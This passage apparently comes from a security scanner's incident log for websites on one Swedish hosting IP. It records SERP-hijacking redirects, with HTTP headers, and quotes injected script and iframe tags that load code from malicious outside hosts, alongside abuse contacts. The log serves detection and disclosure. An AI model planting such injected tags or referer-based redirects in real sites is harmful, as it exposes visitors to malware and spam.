only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1502373742http://zogg.se/2013/01/01/vags-ande/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/01/vags-ande/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 04 Jul 2017 11:58:42 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 04 Jul 2017 09:58:47 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 04 Jul 2017 09:58:47 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1499173329http://zogg.se/page/2/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/page/2/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 04 Jul 2017 11:04:16 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 04 Jul 2017 09:04:16 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 04 Jul 2017 09:04:16 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1499173325http://fangelset.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://fangelset.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 18:05:28 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:05:29 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: wfvt_1347251573=594947c954ea0; expires=Tue, 20-Jun-2017 16:35:29 GMT; Max-Age=1800; path=/; httponly <br>Link: &lt;http://fangelset.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://fangelset.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Referer: http://www.google.com/search?q=fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 16:05:27 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>fangelset.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049954http://fangelset.se/arrangemang/ (194.9.94.194) - Serp-hijackingAttacked url: http://fangelset.se/arrangemang/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 20 Jun 2017 17:27:23 +0200<br><br>Visitors with referer are redirected to http://vados.biz/gosw?keyword=&amp;pill= <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 15:27:24 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Set-Cookie: wfvt_1347251573=59493edcb0b75; expires=Tue, 20-Jun-2017 15:57:24 GMT; Max-Age=1800; path=/; httponly <br>Link: &lt;http://fangelset.se/wp-json/&gt;; rel=&quot;https://api.w.org/&quot; <br>Link: &lt;http://fangelset.se/&gt;; rel=shortlink <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: fangelset.se <br>Referer: http://www.google.com/search?q=fangelset.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.10.3 <br>Date: Tue, 20 Jun 2017 15:27:21 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://vados.biz/gosw?keyword=&amp;pill=<br><br>fangelset.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1498049913http://collectiveknowledgepoint.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://collectiveknowledgepoint.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 01 Mar 2016 10:29:55 +0100<br><br>Visitors with referer are redirected to http://www.pandoranicest.com/?m <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: collectiveknowledgepoint.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Tue, 01 Mar 2016 09:30:01 GMT <br>Server: Apache/2.2.31 (FreeBSD) PHP/5.5.32 mod_ssl/2.2.31 OpenSSL/0.9.8zd-freebsd <br>X-Powered-By: PHP/5.5.32 <br>Set-Cookie: PHPSESSID=b5f7ec563b4dda17b9dac34232244b1c; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: collectiveknowledgepoint.se <br>Referer: http://www.google.com/search?q=collectiveknowledgepoint.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Tue, 01 Mar 2016 09:30:01 GMT <br>Server: Apache/2.2.31 (FreeBSD) PHP/5.5.32 mod_ssl/2.2.31 OpenSSL/0.9.8zd-freebsd <br>X-Powered-By: PHP/5.5.32 <br>Location: http://www.pandoranicest.com/?m <br>Connection: close <br>Content-Type: text/html<br><br>collectiveknowledgepoint.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1456825405http://finetex.se/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://203koko.eu/hjnfh/ipframe2.php&quot; width=&quot;20&quot; height=&quot;30&quot; &gt;<br><br>Offensive url: http://203koko.eu/hjnfh/ipframe2.php<br>Url is blacklisted in Google Safe Browsing<br><br>finetex.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1423034020http://www.minkroppsbild.se/catalog/view/javascript/common.js (194.9.94.194) - MalwareOffensive html code:<br>&lt;script type='text/javascript' src='http://elcastellaltea.com/es/CBjZMrYN.php'&gt;<br><br>Offensive url: http://elcastellaltea.com/es/CBjZMrYN.php<br>Url is blacklisted in Google Safe Browsing<br><br>www.minkroppsbild.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1395990512http://studentenvaxjo.se/studentguide-vaxjo/studentdagar-vaxjo/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645654http://studentenvaxjo.se/skolor-vaxjo/kungsmadskolan/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645654http://studentenvaxjo.se/studentguide-vaxjo/annonsera/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645653http://studentenvaxjo.se/studentexamen/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645652http://studentenvaxjo.se/skolor-vaxjo/katedral-skolan/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645651http://studentenvaxjo.se/studentguide-vaxjo/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645650http://studentenvaxjo.se/skolor-vaxjo/procivitas/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645650http://studentenvaxjo.se/skolor-vaxjo/vaxjo-fria/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645649http://studentenvaxjo.se/studentexamen/studentflak-regler/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645648http://studentenvaxjo.se/skolor-vaxjo/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645648http://studentenvaxjo.se/studentexamen/studera-vidare-2/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645647http://studentenvaxjo.se/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645646http://studentenvaxjo.se/foretag-studentsaker/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645645http://studentenvaxjo.se/skolor-vaxjo/teknikum/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645644http://studentenvaxjo.se/skol-bal/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645643http://studentenvaxjo.se/skolor-vaxjo/vaxjo-fria-fordon/ (194.9.94.194) - MalwareOffensive html code:<br>&lt;script src=&quot;http://vivianarussell.com/plugins/tJuYKhBe.php&quot; type=&quot;text/javascript&quot;&gt;<br><br>Offensive url: http://vivianarussell.com/plugins/tJuYKhBe.php<br>Url is blacklisted in Google Safe Browsing<br><br>studentenvaxjo.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1383645641http://localtrade.se/ (194.9.94.194) - VirusComodo: TrojWareJSAgentJC<br><br>localtrade.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1372145158http://mvsys.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://mvsys.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 03 Jun 2013 07:12:34 +0000<br><br>Visitors with referer are redirected to http://iris-freiburg.de/clik.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Mon, 03 Jun 2013 07:09:11 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>X-Powered-By: PHP/5.4.6 <br>Set-Cookie: PHPSESSID=2fcd391d2b5618588cefb098a3a89d9e; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Location: http://mvsys.se/login <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Referer: http://www.google.com/search?q=mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 03 Jun 2013 07:09:11 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://iris-freiburg.de/clik.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mvsys.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1370248953http://efaktura-info.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://efaktura-info.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 03 Jun 2013 05:22:41 +0000<br><br>Visitors with referer are redirected to http://from-ai-dai-lane.bplaced.net/aawf.html?h=1572116 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: efaktura-info.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Mon, 03 Jun 2013 05:19:16 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>X-Powered-By: PHP/5.4.6 <br>Vary: Cookie <br>X-Pingback: http://efaktura-info.se/xmlrpc.php <br>Set-Cookie: PHPSESSID=7d27c084eb328e425c6bd776b6cbbc5c; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: efaktura-info.se <br>Referer: http://www.google.com/search?q=efaktura-info.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Mon, 03 Jun 2013 05:19:16 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://from-ai-dai-lane.bplaced.net/aawf.html?h=1572116 <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>efaktura-info.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1370248919http://pryl-recensioner.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://pryl-recensioner.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 02 Jun 2013 21:41:00 +0000<br><br>Visitors with referer are redirected to http://akciove-fondy.eu/mwod.html?h=1572116 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: pryl-recensioner.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Sun, 02 Jun 2013 21:51:35 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>X-Powered-By: PHP/5.4.6 <br>Vary: Accept-Encoding,Cookie <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: pryl-recensioner.se <br>Referer: http://www.google.com/search?q=pryl-recensioner.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Sun, 02 Jun 2013 21:51:35 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://akciove-fondy.eu/mwod.html?h=1572116 <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>pryl-recensioner.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1370248700http://mvision.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://mvision.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 02 Jun 2013 14:38:15 +0000<br><br>Visitors with referer are redirected to http://iris-freiburg.de/clik.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvision.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Sun, 02 Jun 2013 14:48:49 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://www.mvision.se/ <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvision.se <br>Referer: http://www.google.com/search?q=mvision.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Sun, 02 Jun 2013 14:48:49 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://iris-freiburg.de/clik.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mvision.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1370248592http://mvsys.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://mvsys.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 02 Jun 2013 09:13:43 +0000<br><br>Visitors with referer are redirected to http://iris-freiburg.de/clik.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Sun, 02 Jun 2013 09:24:16 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>X-Powered-By: PHP/5.4.6 <br>Set-Cookie: PHPSESSID=3fc76080d29ee20bdb8a22f2bdf6c5c5; path=/ <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Location: http://mvsys.se/login <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Referer: http://www.google.com/search?q=mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Sun, 02 Jun 2013 09:24:16 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 mod_ssl/2.2.22 OpenSSL/0.9.8q <br>Location: http://iris-freiburg.de/clik.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mvsys.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1370248300http://mvsys.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://mvsys.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 31 May 2013 01:30:05 +0000<br><br>Visitors with referer are redirected to http://kawai-corp.co.jp/rel.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mvsys.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Fri, 31 May 2013 01:40:29 GMT <br>Server: Apache/2.2.22 (FreeBSD) PHP/5.4.6 